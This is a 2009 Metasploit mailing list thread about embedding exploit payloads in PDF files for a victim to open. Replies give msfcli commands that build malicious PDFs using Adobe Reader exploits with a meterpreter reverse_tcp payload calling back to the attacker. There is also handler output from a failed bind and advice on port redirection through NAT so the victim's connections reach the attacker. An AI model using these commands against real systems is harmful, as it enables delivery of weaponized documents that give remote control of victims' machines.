Metasploit mailing list archives

is it possible to attach metasploit payloads withpdf

From: danuxx at (NeZa)
Date: Sun, 29 Mar 2009 19:06:55 -0500


Bind LHOST to your local ip y.y.y.y .

And the trick is in the x.x.x.x host, you need to to a redirection
port so when getting incoming connections (from victim) to x.x.x.x:443
you redirect to y.y.y.y:443, this is also another way of NAT so you do
not need to take care of switching form internal to external ip's this
is handled automatically by the redirection port software.

My 2 cents.

On Sun, Mar 29, 2009 at 4:05 PM,  <wfdawson at> wrote:
?Yes, I am running it as root.? The "problem" would appear to be that my
call to msfcli cannot bind to the x.x.x.x address as that is not my
interface's actual address.? My address is y.y.y.y which is NAT'ed to
x.x.x.x.? I should not care about that from my side.? The client can
certainly connect to x.x.x.x which then is connected to me by NAT...

-------------- Original message from Natron <natron at>:

Are you running it as root? You can't bind to 443 on a 'normal' account.


On Mar 29, 2009, at 3:14 PM, wfdawson at wrote:


I tried your suggestion. I have a NAT'ed connection to the Internet
where connections to my external address are mapped one-to-one to my
internal address. With the following:

./msfcli exploit/windows/fileformat/adobe_jbig2decode
filename=test2.pdf payload=windows/meterpreter/reverse_tcp
LHOST=x.x.x.x LPORT=443 E

...where x.x.x.x is my actual Internet visible IP address, I
obtained the following response:

[*] Please wait while we load the module tree...
[*] Handler binding to LHOST
[-] Bind failed on
[*] Handler binding to LHOST x.x.x.x
[-] Bind failed on x.x.x.x
[-] Exploit failed: Cannot assign requested address - bind(2)

Is there a way to make this work in my situation?

-------------- Original message from Mirko Iodice
: --------------


./msfcli exploit/windows/fileformat/adobe_utilprintf
filename=document.pdf payload=windows/meterpreter/reverse_tcp
lhost=x.x.x.x lport=5555 E

2009/3/28 Abhishek Kumar :
hi list,

yesterday i was working around attaching a meterpreter reverse_tcp
payload to a MS word document.
It was simple to do because msfpayload provides payloads in VBA

Now,the question is...
is there anything available for pdf files ? > can we embed our
payloads with pdf and then wait for the user to click on it


Mirko Iodice


Daniel Regalado aka NeZa
Hacker Wanna Be from Nezahualcoyotl

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